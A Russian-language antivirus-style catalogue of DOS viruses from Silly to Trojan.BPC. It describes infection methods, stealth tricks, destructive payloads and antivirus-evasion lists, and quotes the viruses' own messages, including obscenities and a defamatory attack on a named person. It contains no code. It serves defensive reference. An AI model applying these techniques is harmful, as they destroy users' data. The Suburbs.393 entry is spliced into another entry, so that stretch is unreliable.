Данное название дается тем вирусам, которым нет возможности дать никакого имени. Обычно эти вирусы не содержат внутри себя никаких текстовых строк и ничем не проявляются кроме саморазмножения.
SillyC - нерезидентные, заражающие COM-файлы.
SillyE - нерезидентные, заражающие EXE-файлы.
SillyCE - нерезидентные, заражающие COM и EXE-файлы.
SillyRC - резидентные, заражающие COM-файлы.
SillyRE - резидентные, заражающие EXE-файлы.
SillyRCE - резидентные, заражающие COM и EXE-файлы.
SillyO - вирусы, замещающие программный код на свой (overwritig viruses).
SillyOR - резидентные вирусы, замещающие программный код на свой.

SillyC.638

Опасный нерезидентный вирус. Иногда разрушает файл, записывая в его начало пять байт, производящих перезагрузку системы. Устанавливает в область таблицы векторов прерываний резидентный код, который иногда издает звуковой сигнал или игнорирует нажатие на клавишу.

SillyE.714

Очень опасный нерезидентный вирус.Уничтожает случайные сектора текущего логического диска.

SillyE.1264

Очень опасный вирус. Не заражает файлы до августа-месяца. После 3 числа месяца в корневом оглавлении диска C: ставит всем элементам оглавления признак удаления, байт 0E5h.

SillyRC.438

Опасный резидентный вирус.Может уничтожить информацию на всех доступных логических дисках.

SillyRCE.972

Опасный вирус. Заражает COM и EXE-файлы не различия их по именам или по формату, стандартным образом для COM-файлов,- записывая 5 байт перехода на вирусный код в начало файла, и основное тело вируса в конец файла. По окончании своей работы восстанавливает 5 начальных байт на оригинальные значения, самостоятельно запускает программу (f.4B00h INT 21h), и после возвращения управления вирусу, обратно восстанавливает начальные байты на вирусный переход. Иногда при старте программ, размер которых больше, чем 64K, вирус уничтожает данные программы, записывая в них 30000 случайных байт.

SillyRE.488

Опасный резидентный вирус. Блокирует вывод на принтер. При записи в файл (f.40h Int 21h) производит смещение буфера записи на величину 1992h.

SillyRE.525

Неопасный резидентный вирус. После установки своей резидентной копии вирус выводит текст "Hallo world!".

SillyRE.666

Опасный шифрованный вирус. После установки в память своей TSR-копии вирус записывает длинной записью (f.0Bh INT 13h) в 11 сектор 0 дорожки 1 головки (обычно первая копия FAT) "мусор".

SillyWilly.2256

Очень опасный полиморфный вирус. Заражает *.COM-файлы на диске C:. У инфицированных файлов изменяет 16 байт начала файла, а также 16 байт в случайном месте файла. Из первого участка кода вирус передает управление во второй участок, из которого уже управление передается на расшифровщик основного тела вируса. Вирус производит поиск *.EXE-файлов и уничтожает их, записывая поверх программного кода 1317 байт программы.

Sily.745

Неопасный резидентный вирус. После 31 августа выводит текст:
-== Hi! Everybody! This is nice and sily virus for you ==-
Постоянно изменяет цвет фона данного текста (красный, синий, зеленый) и в такт изменения цвета мигает лампочками NumLock, CapsLock, ScrollLock.

Simulation

Неопасный нерезидентный полиморфный вирус. Не заражает COMMAND.COM. После заражения COM-файла может вывести одно из перечисленных сообщений:
HA HA HA YOU HAVE A VIRUS !
FRODO LIVES!
Have you ever danced with the Devil in the pale moonlight?
DATACRIME VIRUS RELEASED: 1 MARCH 1989
ALIVE... Your system is infected by the SIMULATION virus.
Have a nice day!

Skew.445, 458, 469

Неопасные резидентные вирусы. Каждый час сдвигают развертку на мониторах EGA, на CGA или VGA "дергают" развертку.

Sl.142, 155, 181, 200(1,2)

Резидентные вирусы. Располагаются в памяти по адресу 0060:0000. Sl.142 перехватывает INT 17h (вывод на принтер) и обнуляет 15 бит при печати. Свое название получили по инициалам своего создателя - Свиридова Льва.

Slava.492, 500

Неопасные резидентные вирусы. Содержат тексты "command" и "Слава Владыке".

Slovakia.3584 (1-3), Slovakia.Kill

Опасные полиморфные стелс-вирусы. Slovakia.Kill при старте на компьютере с процессором Pentium в октябре до 11 числа уничтожает случайные сектора жесткого диска. При заражении файла во время его запуска, переименовывают его в файл svl.svl, заражают его и возвращают данному файлу первоначальное имя. Удаляют файлы chklist.ms, chklist.cps, smartchk.cps, в каталоге инфицируемого файла. Содержат текстовую строку "scan avg vir asta alik rex msav cpav nod clean f-prot tbav tbutil avast nav vshield vsafe dizz". Файлы, в именах которых встречаются данные текстовые последовательности, вирусы не заражают.

Sly

Очень опасный файлово-загрузочный вирус. Заражает EXE-файлы и MBR жесткого диска. При старте зараженного EXE-файла, вирус заражает MBR "винчестера" и "перезагружает" систему. При загрузке системы с такого инфицированного диска, вирус устанавливает свою резидентную копию в память и "перехватывает" INT 13h (операции с дисками). При чтении или записи дискового сектора, вирус проверяет не является ли данный сектор заголовком EXE-файла (сигнатура "MZ" в начале файла). Если данный сектор в своем начале содержит слово "MZ", то вирус записывает вместо данного сектора свои 512 байт кода, которые также находятся в формате EXE-файла. Оригинальный же сектор заголовка EXE-файла вирус записывает в случайный сектор данного диска и запоминает координаты данного сектора в своем теле. Резидентная копия вируса также отслеживает чтение секторов, содержащих вирусный EXE-заголовок, и по сохраненным координатам сектора, содержащего оригинальный EXE-заголовок, восстанавливает данный заголовок в памяти. Таким образом, данный вирус является стелс-вирусом, и если сектор с оригинальным EXE-заголовком не был перезаписан DOS, то при старте инфицированного EXE-файла, резидентная копия вируса "подставит" "нужное" начало инфицированного EXE-файла. Механизм заражения устроен таким образом, что при каждом заражении EXE-файла на жестком диске, существенно уменьшается вероятность следующего заражения EXE-файла на "винчестере". Все свое внимание вирус пытается "сконцентрировать" на EXE-файлах на флоппи- дисках.

SMEG-вирусы

SMEG (Simulated Metamorphic Encryption Generator) - полиморфный генератор вирусных шифровщиков и расшифровщиков. Создан английским вирусописателем известным, как Black Baron. По имеющимся данным он был арестован в июле 1994 года британской полицией за создание очень опасных вирусов SMEG.Pathogen и SMEG.Quueg (см. ниже).

SMEG.Pathogen.3732

Очень опасный, использующий довольно сложный алгоритм шифровщика, полиморфный вирус. В расшифровщике могут использоваться все команды передачи управления для внутрисегментной адресации. Перехватывает INT 21h, INT 13H, INT 20h. В понедельник может записать в CMOS в байт 10h (тип используемых флоппи-дисков) значение 0 - дисководы не установлены. После этого корректирует контрольную сумму CMOS (ячейки 2Eh-2Fh), чтобы при инициализации системы BIOS "не заподозрил" неладное. После данных манипуляций компьютер "не видит" дисководов гибких дисков. Также в понедельник в 11 часов, при определенных условиях, может вывести текст:
Your hard-disk is being corrupted, courtesy of PATHOGEN!
Programmed in the U.K. (Yes, NOT Bulgaria!) [C] The Black Baron 1993-4.
Featuring SMEG v0.1: Simulated Metamorphic Encryption Generator!
'Smoke me a kipper, I'll be back for breakfast.....'
Unfortunately some of your data won't!!!!!
И, действительно, после этого устанавливает обработчик клавиатуры INT 09h на свой код и уничтожает информацию в случайных секторах первого жесткого диска (80h). Если в этот момент не перегрузить компьютер кнопкой "RESET" или не выключить питание (комбинация Ctrl-Alt-Del - не поможет), то содержимое "винчестера" может быть полностью уничтожено.

SMEG.Trivia.2437

Неопасный нерезидентный полиморфный вирус. В пятницу 13 числа выводит сообщение "This program requires Microsoft Windows.", после чего заканчивает выполнение инфицированной программы f.4C00 INT 21h. Данный вирус был создан Black Baron для демонстрации использования его полиморфного генератора SMEG v0.3.

Smile.4320

Неопасный резидентный файлово-загрузочный вирус. Заражает MBR жесткого диска. При загрузке системы с инфицированного диска вирус устанавливает свою TSR-копию в память и перехватывает INT 21h. Иногда может проиграть "хохот и удаляющиеся шаги".

Sms.480

Неопасный резидентный вирус.Имеет такой текст "SmS bItEs !!! aNd Is gAy ToO !!! wRiTteN bY BiGMaRtY, 2/13/96 HaPpY vAlEnTiNeS DaY eVeRyOnE... tRy nOt tO fUcK tOo mUcH ;)".

Snap.228

Опасный нерезидентный вирус. Из-за ошибки разрушает файлы,длина которых менее 228 байт. По окончании своей "деятельности" производит негромкий "щелчок".

Snowfall.5000 (1,2)

Очень опасные шифрованные резидентные стелс-вирусы. Иногда выводят сообщение:
Swap file creation error at 0FAD:2DEC.
Program aborted.
и прекращают выполнение программы. В январе выводят на фоне снегопада текст:
Happy New Year !
Ghost 1.0 is terminating it`s work now. Please wait...
Write down this number : 0000000000 and pray for your data rescue.
И пока пользователь любуется снегом, "заметающим" данный текст, вирусы шифруют сектора первого жесткого диска, указанным в тексте ключом. Вирусы мешают работать с файлами, имеющими расширения PAS и CPP. Содержат также текст:
I feel so tired.
The way the rain comes down how it`s how I feel inside.
I`ve been living so long with my pictures of you
Remembering you standing quiet in the rain
There is nothing in the world that I ever wanted more than to never
feel breaking apart all my programs again.
The spiderman is always hungry

Sochi.703

Очень опасный нерезидентный вирус. Записывает в MBR жесткого диска троянский код, который после 40 перезагрузок с жесткого диска в течение 20 загрузок выводит сообщение "Enter password:", после чего уничтожает код собственного загрузчика активного boot-сектора. Содержит текст "*Ks&I* Sochi Olympic Games 2002".

Solar.512

Опасный резидентный вирус. Блокирует запись на диск B:. Содержит текст:
"Bring your FDD drive... to the slaughter"© Solar Wind fault!
Function not

Sosun.232

Неопасный резидентный вирус. "Перехватывает" только INT 10h. При вызове данного прерывания вирус пытается определить имя по текущему PSP стартовавшей программы и инфицировать ее.Содержит текст "Видал сосун ?"

Sov.1193, 1205

Неопасные резидентные вирусы. 23 февраля, 7 марта, 22 и 30 апреля, 6 ноября Sov.1193 рисует на экране черно-белые полосы.

Sova.4060

Опасный резидентный вирус. 29 февраля и 3 марта уничтожает все файлы и каталоги в корневом директории диска,имена которых начинаются на WIN. Имеет текст "sova!!".

SoulMan.5536

Неопасный резидентный полиморфный вирус. Написан на языке Turbo C++ с ассемблерными вставками. Hе заражает файлы TB*, IC*, DR*, *AN. Вирус имеет, как и положено для программ, написанных на C, стандартную внутреннюю структуру: стартовый код, основную процедуру Main, библиотеки C и сегмент данных. Но основная процедура Main написана на ассемблере и является полиморфнозашифрованной. При старте вируса управление попадает на startup, производится настройка программы, а далее управление передается процедуре Main, которая расшифровывает себя и библиотеки C, а затем устанавливает в память свою резидентную копию. Для возвращения управления программе-носителю вирус обрабатывает функцию завершения работы (f.4Ch Int 21h) и вместо завершения работы отдает управление точке входа оригинальной программы. Вирус содержит тексты:
Dis quick test virus was written by The Soul Manager on 5/9/97
(Yes, yes, I *ADMIT* I should find something to do with a Friday night).
Greetz to Immortal Riot (from Australia).
I am, I am, I am

Spanska.1000, 1120 (1,2), 1500

Опасные нерезидентные зашифрованные вирусы.Из-за ошибок могут разрушить инфицируемые файлы. В период с 22.00 до 22.30 рисует на экране в графическом режиме языки пламени и выводят тексты:
Remember those who died for Madrid
No Pasaran! Virus © El Gato 1996
To Carl Sagan, poet and scientist,this little Cosmos. (Spanska 97)
Spanska.1500 выводит в графическом режиме изображение, видимо, Марса и
текст "Mars Land, by Spanska(coding a virus can be creative)".

Spanska.4250

Неопасный резидентный полиморфный вирус. При заражении файлов создает свою полиморфную копию в зависимости от текущего числа месяца. Копии зараженных файлов в один день будут отличаться от таких же файлов, инфицированных на следующий день. Не заражает файлы из списка (по 2 символа на имя): TBVIAVNAVSFIF-FVIVDRSCGUCOPKARRALHBA. Пытается заразить файл C:\WINDOWS\WIN.COM. Если значение минут системного времени равно 30, то вирус выводит в графическом режиме один из следующих текстов:
ELVIRA !
Black and White Girl
from Paris
You make me feel alive.
ELVIRA !
Pars. Reviens. Respire.
Puis repars.
J'aime ton mouvement.
ELVIRA !
Bruja con ojos verdes
Eres un grito de vida,
un canto de libertad.
Содержит текст "© Spanska 97".

Specified.2048

Опасный резидентный вирус. Перехватывает INT 13h, 21h. При записи секторов через INT 13h вирус может изменить некоторый байт на значение 0FFh. При запуске программ с дисков A: или B: вирус уничтожает содержимое сектора 1 на головке 1 данного диска. Содержит тексты:
Specified!
cess denied
Access denied
Out of environment space
Incorrect DOS version
Invalid environment size specified
/DEV/CON
\COMMAND.COM A:\AUTOEXEC.BAT

Spirit.1710

Опасный резидентный вирус. С июля по декабрь в 11 и 16 часов уничтожает содержимое 15, 16 и 17 сектора н а нулевой дорожке жесткого диска. Содержит текст "** © The Evil Spirit ** Gabrovo city, Bulgaria. Last_change : 28.05.1993". Не заражает программы COMMAND.COM, F-PROT, F-TEST, VIR, DIR2CLR, IMV, ANTI, DOCTOR, SCAN, CLEAN, IVC, CHKDSK.

Split.250

Опасный нерезидентный вирус. 1 числа уничтожает файлы ????????.D??. Содержит строку "SPLIT".

Spook (1,2)

Очень опасные загрузочные вирусы. Spook (1) при каждом 4 заражении MBR, а Spook (2) при каждом 3, не сохраняют 2 последних элемента таблицы логических разделов первого жесткого диска. Содержат текст "Spook 1.0 LIM"

Spruce.976

Неопасный резидентный вирус. Может несколько раз устанавливать в памяти свою резидентную копию. Пытается иногда играть мелодию "В лесу родилась елочка", но это ему не удается.

Srp.2248, 2296, 2380

Неопасные нерезидентные вирусы. При заражении EXE-файла Srp.2248 издает звуковой сигнал. Srp.2296, 2380 при заражении файлов выводят текст "Successfully". Srp.2380 содержит тексты:
Я хорошая собачка ! Молчи , ЖЕНЩИНА ! © Copyright 1996 by ВАНЯТКА
(AKA M-r TapeWorm) tel +7(095) FuckYou!!!

Ssr.1945 (1,2)

Неопасные зашифрованные (Ssr.1945 (2) - полиморфный) вирусы. 8 и 9 мая 1995 года (Ssr.1945(2) - в мае 1997 года, начиная с 9 числа) выводят на экран:
Б Е Й Ф А Ш И С Т О В !!! З А Н А Ш У С О В Е Т С К У Ю Р О Д И Н У !
З а С т а л и н а и П а р т и ю !!!
Ждет нажатия на клавишу,после чего проигрывает мелодию. Содержит текст:
AntiFashist
Это,собственно,не программа,
а самое общее марксистское заявление... (В.И.Ленин)
Советский сношатель by Stainless Steel Rat
Проживи всю жизнь Этой датой !
S.S.R.S.S.R.S.S.R.S.S.R.S.S.R.

Stardot.979

Неопасный нерезидентный вирус. Иногда выводит сообщение "MONKEY!". Оставляет в памяти по адресу 0000:0313h резидентную программу, производящую эффект "осыпания букв".

Strafer

Очень опасный загрузочный вирус. Через 10 дней после заражения жесткого диска уничтожает всю информацию на этом диске. Содержит текст "Boot Strafer".

Strike

Опасный загрузочный вирус. При заражении флоппи-дисков не сохраняет оригинальный загрузочный сектор. При загрузке с такого диска, вирус выводит текст:
Non-System disk or disk error
Replace and strike any key when ready
При чтении EXE-файлов, IP которых равен значению 0Eh (файлы,упакованные LZEXE),и не содержащих по смещению 1Ch буквы "L" ("LZ91") (таким файлом является AIDSTEST.EXE), вирус изменяет первый байт в буфере чтения на байт 0C3h. В результате при запуске такой программы DOS выдаст ошибку запуска.

Strip.1972

Неопасный резидентный вирус. Периодически выводит текст:
Уважаемые дамы и господа !
Если Вы занимаетесь бизнесом, то может эта инфоpмация
поможет Вам избежать многих непpиятных сюpпpизов.
В г.Житомиpе " тpудится" диpектоp Житомиpского НИИ Радиосис-
тем пан Кpавец Л.Г. Хотим заpанее пpедупpедить Вас, что иметь
дело с указанным паном очень pискованная пеpспектива т.к. Вы
будете ободpаны как "липка" да еще и наживете себе кучу пpоб-
лем сpеди себе подобных людей и Вашего pуководства.
Пан Кpавец имеет пpивычку гадить даже своим уволившимся сот-
pудникам на их новых местах pаботы. Это у него считается пpави-
лом хоpошего тона и, по-видимому, кpитеpием всей жизни. Все
сотpудники его так называемого НИИ, - "воpы и спекулянты" ( ци-
тата из пеpвоисточника).
Пpосим пpощения за столь своеобpазный ваpиант пpедоставления
данной инфоpмации. Понимаем, что данный поступок не кpасит так-
же и автоpов данного виpуса, но по дpугому донести эту инфоpма-
цию к сожалению у нас нет возможности.

Suburbs.393

Неопасный резидентный вирус. Имеет текст "[VD/SLAM]сшифровщиков. Является модификацией полиморфного генератора APE. Создан отечественным вирусописателем известным, под кличкой ДNighЕД$piriЕД (или в народе - Дмитрий Петренко 2:5083/14.7). Различные версии генератора содержат текст "$pirit's Universal Polymorphic Device v1.0. ©1995 by ДNighЕД$piriЕД", а также различные версии генераторов содержат тексты "[$UPDы1.0]","[$UPDы1.5]", "[$UPDы2.0]", "[$UPDы2.1]". Версии 2.0 и 2.1 используют в расшифровщике клавиатурный буфер с помощью прерывания INT 16h.

Switch.855

Опасный вирус. Содержит строку "The SWITCH is ON The Doc ©1994 chklist.cps anti-vir.dat". Два последних файла в строке вирус пытается удалить.

Syrian.241

Опасный резидентный вирус. Внедряет свой код во все запускаемые программы, уничтожая программный код. Выводит следующие сообщения:
Bad command or filename
MS-DOS v4.22
Volume label for drive Z is Infected!
Также содержит текст "Syrian Brain II".

SysLock.Cookie.2232

Опасный резидентный вирус. При заражении COM-файлов может записать в начало файла 35 байт вирусного кода перехода в конец файла на основной вирусный код,.. но этот основной код записать "забудет". Т.о., файл окажется разрушенным. Выводит сообщение "I want a COOKIE !" и ждет ввода слова "cookie", после чего пишет "BURPS....." и отдает управление программе-вирусоносителю. Не активизируется если установлена переменная SET VIRUS=OFF

0

20

T

TaiPan.Hooze

Неопасный резидентный вирус. 5 августа устраивает "шутки" с разверткой монитора. Содержит текст "[Hooze Virus 1.0 (Tai-Pan clone)]".

Tarakah.4064

Неопасный нерезидентный шифрованный вирус. Если во время заражения файлов произошла ошибка, то вирус выводит одно из следующих сообщений:
ERROR OF FUNCTION'S NUMBER
FILE NOT FOUNDED
PATH NOT FOUNDED
TOO MANY OPENED FILES
ACCESS IS NOT OPEN
ERROR OF FILE'S NUMBER
BLOCK OF MEMORY RULING IS BROKEN
TOO FEW MEMORY
ERROR OF ADRESS OF MEMORY'S BLOCK
ERROR OF EQUIPMENT
ERROR OF FORMAT
ERROR OF ACCESS
ERROR OF DATA
I DONT KNOW WHOT HAPPENED:...... KAKAYA-TO
ERROR OF DEVICE
ERROR OF DIRECTORY
IT'S NOT RIGHT DEVICE
DONT ANY FILES YET
А также иногда просит нажать клавишу F8 и выводит следующие сообщения:
Nu vot Ya i v ECONOME !
Eto snova Ya - TARAKAH is tvoego computera
I opyat Ya
POSOVI leontya veniaminovicha iz 215, YA HOCHU EGO !
LEONTIY ! osvoil li ty BASIC nakonec
decanom mogesh ty not to be, no SUPERCAL ty znat obyasan !
-leontiy KAKASHKA-
TELEFON DLYA VASHEY REKLAMI-13-29-66 (SPROSITE EVREYA)
POGALUYSTA, KOZLIK,
NE BUD GADOM
NAGMI KEY F8
CHORT BOZMI, KAKOY YOU DUB
YA GE SKAZAL-F8, POPROBUY ESCHO
NU DEREVO, POSLEDNIY RAZ PROSHU
NE TAKOY UG YOU DURAK
OTVALI, YA OBIDELSY
OX, OX, OOOOO YA TORCHU
ESCHO DAVNI RAZOCHEK, DURACHOK
NE TUDA POLEZ, DURACHOK
AX, AX, UX, EX, YA LUBLU TEBYA, DURASHKA
NU WE ESCHO VSTRETIMSYA, PROKAZNIK...
NAGMI ANYKEY

Taz.987, 1041

Опасные резидентные вирусы. Удаляют некоторые антивирусные программы, после чего в Taz.1041 планировался вывод сообщения:
FUCKIN IT
uhhh.....
huh huh
Содержит тексты "[TAZ-10] By The WРТ$ИL", "© Sector Infector 1993", "°±І TТZ-10 І±°", "Released 12-06-93", "Yes, it is a Firefly Hack!", "I Miss Ya, Taz!", "Time to FUCK it UP!" .

TCE.Persecute

Неопасный резидентный полиморфный стелс - вирус. При открытии инфицированных файлов удаляет свой код из них, но только в том случае, если эти файлы открываются не архиваторами. Вирус проверяет имя программы, открывающей файл. Вирус не заражает файлы из списка (по 2 символа на имя): COF-AV-VTBVI00VBCHSCDENDSPPRARPKRAUCLHZIUUIV. Вирус удаляет файлы CHKLIST.MS, CHKLIST.CPS, ANTI-VIR.DAT.

Teacher.2000

Неопасный резидентный вирус. Перехватывает INT 21h, 28h.

Temptation

Неопасный загрузочный стелс-вирус. Иногда при загрузке с зараженного жесткого диска выводит сообщение:
©Light General
THE LAST TEMPTATION

TenBytes.1411, 1514

Очень опасные резидентные вирусы. После сентября при записи в файл, сдвигают буфер для записи (DS:DX) на 10 байт.

Tentacle.10496

Опасный резидентный полиморфный вирус. Записывает свой зашифрованный полиморфный код в конец файла-жертвы, после него записывает "длинный" JMP FAR на свой код и корректирует таблицу перемещаемых символов. Если файл содержит оверлей, то вирус "сдвигает" оверлей вниз и записывает свой код между телом файла и оверлеем. При открытии GIF- файлов с вероятностью 1/8 вирус переименовывет данный файл в имя TENTACLE со случайным расширением и записывает в оригинальный файл изображение щупальца осьминога и надписью "I'm the Tentacle Virus" в GIF-формате.

Tequila

Неопасный файлово-загрузочный полиморфный стелс-вирус. Заражает MBR жесткого диска и EXE-файлы при их открытии или запуске. Иногда выводит на экран картинку, напоминающую силуэт самолета и текст:
Execute: mov ax, FE03 / int 21. Key to go on!
При выполнении данных инструкций вирус выводит на экран следующий текст:
Welcome to T.TEQUILA's latest production.
Contact T.TEQUILA/P.o.Box 543/6312 St'hausen/Switzerland.
Loving thoughts to L.I.N.D.A
BEER and TEQUILA forever !

Tequila.5volt

Неопасный резидентный полиморфный вирус. Не заражает файлы WIN*.*, CHKDSK*.*, BACK*.*. Содержит текст:
This is a beta version of the '-5 Volt' virus. A final and error free one will never follow because I've got enough of viruses. Now a message to the programmers of Turbo Anti Virus: You do a dangerous play with INT 21h in your TSAFE utility. It took me quite a long time to make the virus compatible with TSAFE. Please use clean programming technics in your next version. Today it's a Saturday and a big party with a lot of TEQUILA takes place! Wow!! Greetings to the U.S. Army in Iraq.

Terra.1027, 1042

Неопасные резидентные вирусы-спутники. Создают вирусный COM-файл- спутник для файлов с расширением EXE. Не заражают файлы, начинающиеся на COMMAND,IBM,ET,PC,TB, CKVI,KLVI,DEVI,BTOOL,RTOOL,TDISK, SCAN, CLEAN, HUNT,F-,TR,G,Z.

Terrorist.1740

Очень опасный нерезидентный шифрованный вирус. 15 октября выводит текст "HAPPY BIRTHDAY OKSANA". Хранит некоторые свои счетчики в конце файла C:\COMMAND.COM. Может прочитать 16 первых секторов диска C: в память, уничтожить содержимое этих 16 секторов на диске и вывести текст:
WARNING
ВНИМАНИЕ
Я Вирус ТЕРРОРИСТ ! Ваш компьютер захвачен в заложники !
Если вы выключите машину или прервете программу,то информацию
о таблице размещения файлов (FAT) вам уже никто не востановит !!!
Если вы хотите чтоб у вас было все в порядке вы должны
выполнить мои условия :
Подождите до 3 часов ночи !!!
Если подождете обещаю все починить !
ПРИЯТНЫХ СНОВИДЕНИЙ !!! (Crazy)
После чего выводит в левом верхнем углу экрана текущее время и ждет наступления 3 часов ночи. После чего записывает обратно на диск сохраненные в памяти 16 секторов диска C:. Иногда может вывести также сообщение "I~m here !".Содержит тексты "ПОЛУЧАЙТЕ СУКИ","CRAZYCRAZY !".

Tet.365, 393, 409, 474, 733

Неопасные (Tet.733 -опасен) нерезидентные вирусы. Содержат строку "383" из-за которой и получили свое название - Three Eight Three. Tet.733 может разрушать файлы, записывая в них код, который выводит текст "This program requires Microsoft Windows." и "перегружает" систему. Иногда может вывести текст "Почтим ЗАВИСАНИЕМ память китайского хакера, убитого подлыми коммунистами." и "вешает" систему. Tet.733 также содержит текст "383 v1.5 ©LovinGOD, fUcKRAINE.".

Thc.1058

Опасный резидентный вирус. При открытии файлов, содержащих первый байт E9h или B8h, вирус записывает в них 5 байт, вызывающих перезагрузку системы. Также уничтожает 5 первых байт в файлах, первый байт которых - EAh. Содержит текст "Aidstest Fucker. Copyright © by Troitsk Hackers Club".

Thunder.1543

Опасный резидентный шифрованный вирус. Внедряет свой расшифровщик (21 байт) в середину файла,а основной зашифрованный вирусный код записывает в конец файла. "Перехватывает" INT 13h, 21h,а после 20 декабря и INT 8. При чтении или записи некоторых секторов(в которых встречается какая-то последовательность байт (?)) вирус возвращает ошибку чтения или записи.

Tiso.1279

Неопасный файлово-загрузочный шифрованный вирус. Иногда, при загрузке, системы выводит "Nech zije Jozef Tiso, prvy slovensky prezident !".

Tmc.4829, 5440

Неопасные резидентные полиморфные вирусы.Используют довольно интересный полиморфный механизм. При старте инфицированной программы, вирус получает управление и производит создание в памяти своей новой копии. Вирус хранит в своем теле таблицы по которым по определенным законам строит свой код. При построении этого кода вирус может внедрить в любое место кода (вместо очередной инструкции) команду перехода (E9 ?? ??) в свободное (не занятое еще "рабочими" инструкциями) место и продолжить построение своего кода с этого места.Вирус строит таблицы "уже занятых" областей и "настраиваемых" адресов для корректного создания своего потомка. Также он способен варьировать безусловными переходами (например, замена JE на JNE) в некоторых ситуациях. Затем вирус расшифровывает свой код, который также не является постоянным и устанавливает в память "на INT 21h" свою резидентную копию. Причем обработчик INT 21h также является непостоянным и имеет различные смещения. Далее эта резидентная копия заражает файлы только этим кодом. Для текущего сеанса работы (до следующей установки в память) все копии вируса при заражении файлов будут одинаковы.

Todor.1993

Опасный полиморфный вирус. После 15 августа шифрует первый сектор первой копии FAT. Не заражает файлы, имеющие по смещению +20h строку ©Todor и файлы, упакованные утилитой LZEXE v.0.90. Содержит ошибку, в результате которой каждый 6 файл будет неработоспособен.

Tony.338

Опасный резидентный вирус. Размещает свою резидентную часть в области таблицы прерываний по адресу 44:100h. Инфицирует COM-файлы, внедряя свой код в область нулей, если в файле таковая имеется. При установке в память пытается сразу же заразить командный процессор. В вирусе имеется ошибка, в результате которой инфицированные файлы могут быть неработоспособными и лечению неподдающимися. Содержит строку "Tony".

TPE.CivilWar.1979, TPE.CivilWar.1994, TPE.CivilWar.1997, TPE.CivilWar.2049

Полиморфные вирусы. TPE.CivilWar.1979, TPE.CivilWar.1994 и TPE.CivilWar.1997 - нерезидентные. Содержат строки:
TPE.CivilWar.1979:
Civil War IV, © 1993 *.com
For all i'v seen has changed my mind
But still the wars go on as the years go by
With no love of God or human rights
'Cause all these dreams are swept aside
By bloody hands of the hypnotized
Who carry the cross of homicide
And history bears the scars of our Civil Wars.
[ DH / TridenT ] [ MK / TridenT ]
TPE.CivilWar.1994 и TPE.CivilWar.1997:
Civil War IV v1.1, © Jan '93 *.com
For all i've seen has changed my mind
But still the wars go on as the years go by
With no love of God or human rights
'Cause all these dreams are swept aside
By bloody hands of the hypnotized
Who carry the cross of homicide
And history bears the scars of our Civil Wars
[ DH / TridenT ] [ MK / TridenT ]
TPE.CivilWar.2049 - резидентный вирус. Содержит строку:
Civil War V v1.0, © Jan '92
[ DH / TridenT ][ MK / TridenT ]

TPE.Dgme.1758, 2648, 2518

Неопасные нерезидентные полиморфные вирусы. Содержат строку: DGME © 1993 American Eagle Publications, Inc., All Rights Reserved.

TPE.Gambit.2259

Неопасный полиморфный резидентный вирус-спутник. Содержит строку "Gambit 1.0 by Viper [NuKE][ MK / TridenT ]".

TPE.Girafe

Неопасный резидентный полиморфный вирус. Не заражает файлы с именами CO*.*, SC*.*, CL*.*, VS*.*. Содержит строки текста: "COSCCLVSNEHTTBVIFIGIRAFEMTBRIM", "[ MK / Trident ]", "Amsterdam = COFFEESHOP!". По пятницам при запуске инфицированной программы с вероятностью 1/256 выводит сообщение "LEGALIZE CANNABIS" и изображение зеленого листа. См. MtE.Coffeeshop

TPE.Kela.4546

Полиморфный стелс-вирус. В пятницу 13 числа выводит красивую переливающуюся всеми цветами картинку с надписями "KELA". Содержит тексты:
This is KELA-17 version virus.
KELA-17 very nice virus . Ha Ha HaHa
KELA - 17.Выражаю свою благодарность автору TPE, KELA.
Copyright © 1994 by KELA. All Rights Reserved. KELA вечен. Смерть
Лозинскому и Мостовому. Смерть всем пользователям ЭВМ.

TPE.Lamer

Опасный резидентный полиморфик. В декабре уничтожает 30 первых секторов диска C:

TPVO.3783

Неопасный резидентный стелс-вирус. Заражает COM, EXE, NewExe - файлы и загрузочные сектора дисков. Внедряет свой код в ядро DOS, поэтому его очень сложно найти в памяти компьютера.

Traka.1471

Неопасный файлово-загрузочный вирус. Содержит текстовую строку [TRAkA- TRAkA]/ARGENTiNA

Trakia.561, 570, 653, 1070

Резидентные вирусы. Trakia.653, 1070 - опасны. Trakia.653 портит файлы, имеющие расширения DWG, DWF, DXG, DXF, а Trakia.1070 производит поиск какой-то строки в стартующих EXE-файлах и если находит ее, то правит этот файл.

Transmitter.1044, 1747, 1899

Неопасные резидентные вирусы. Transmitter.1044 10 числа пытается сдвинуть весь текст на экране, но может это сделать только на черно- белых мониторах.Transmitter.1899 14 числа может вывести на экран текст:
Do you Want to kill computer ?
Don't press any key !
Your MBR, BOOT ,FAT & ROOT only in memory,
and if you want to destroy all DATA in computer,
then you can press any key
but if you want to recover this sectors then,
you must press right key!!
Transmitter II (1996) (Dangerous Virus)
Find ME : u/56@\fir6#Ki*|Kj6DzGoYHW2wqd.q
Вирусы содержат тексты:
Transmitter.1044:
Transmitter © by MYSELF 1996
Transmitter
Transmitter.1747:
Transmitter two © by MYSELF 1996
transmitter
Transmitter.1899:
Transmitter three © by MYSELF 1998 /Hail 2 Murmansk!/ :~(
transmitte3

Traven.515

Неопасный нерезидентный вирус. Иногда "трясет" экран. Содержит строку "by Traven(Traveller)".

Trident.346

Полиморфный опасный вирус. После заражения файла выводит на экран рисунок.

Tripper.1952

Неопасный нерезидентный вирус. В пятницу может вывести одно из следующих сообщений:
Hardware detection error: CPU bad or missing.
Exception #0D: Attempt to write to write protected CPU register.
DMA failure: access is too direct.
Access violation: application terminated
DPMI error #013: HMA is too high, need line A21.
Divide overblow (or ...flow, do you know?).
By the way, do you know what job is blow?
Fucked file corrupt.
Virus warning: This file is possibly infected by Tripper!
Incorrect DOS perversion.
Incorrect user version, upgrade, please.
This program must be run under Win32.
Abnormal program termination: consult with her psychiatrist.
fuck: jmp far 0ffffh:0000h
Oracle® proclaims: Enabling Information Age Through the Network Computing.
Hitler kaput!
Lozinsky - woodpecker, AIDSTest - :)
Tripper message:
One more file succesfully infected by Tripper.
Shit! A fucking error occured!
Write protection will not save you!
You bastard! Put the diskette in right now!
При запуске инфицированной программы с ключом /vir??? вирус выводит текст:
Tripper® Version 1.0 for Intel-8086®
©Copyright Golem 01/08/98(1998)

Trojan - "троянские" программы.

Содержащийся в данных программах код не является вирусным кодом. Как правило, данные программы несут в себе деструктивные функции.

Trojan.BPC

Производит поиск файлов *.* и записывает в них 392 байта кода, уничтожающего 255 секторов первого жесткого диска и выводящего на экран текст:
CONGRATULATIONS !
Y0UR ZYZtEM WAZ PHUCKEd bY
BBS PhAcKeRz ClUb `1994 !
